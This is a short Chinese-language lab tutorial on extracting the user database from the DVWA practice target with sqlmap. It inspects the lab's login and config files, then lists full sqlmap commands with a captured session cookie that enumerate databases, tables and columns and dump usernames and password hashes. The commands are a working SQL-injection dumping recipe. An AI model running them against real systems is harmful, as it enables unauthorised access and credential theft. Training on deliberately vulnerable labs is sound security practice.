本文描述使用sqlmap对DVWA靶机进行脱库

一、先登录靶机,查看目标靶机的用户名密码

1、先查询dvwa靶机的登录代码文件

    进入OWASP系统的/var/www/dvwa目录,查询login.php登录文件可知,存在sql注入,如下:

sqlmap DVWA脱库

2、进入/var/www/dvwa/config目录,查看config.inc.php文件得到dvwa数据库的用户名和密码:

sqlmap DVWA脱库

3、连接dvwa数据库:mysql -u dvwa -p,密码为dvwa,得到dvwa库和users表,查询出表中的用户名和密码

sqlmap DVWA脱库sqlmap DVWA脱库

到这里我们得到了目标靶机的用户名以及对应密码的md5值

二、使用sqlmap进行爆库

1、打开dvwa-->sql injection,把级别调到low

抓包,得到requests url和cookie(slmap扫描的时候会重定向到认证的页面,拿到cookie,才能在这个页面进行持续扫描)

sqlmap DVWA脱库

sqlmap DVWA脱库

2、扫描当前页面

    sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --       cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7'

sqlmap DVWA脱库

3、获取数据库名称

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dbs -v 0

sqlmap DVWA脱库

4、获取表明

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' -D dvwa --tables
sqlmap DVWA脱库

5、获取列名

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' -D dvwa -T users --columns

sqlmap DVWA脱库

6、脱库

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#' --cookie='security=low;PHPSESSID=9sl0enh9nkoto78fro3r8df4l7' --dump  -D dvwa -T users -C 'user,password'

sqlmap DVWA脱库

保存在用户名密码保存在users.csv里

相关文章: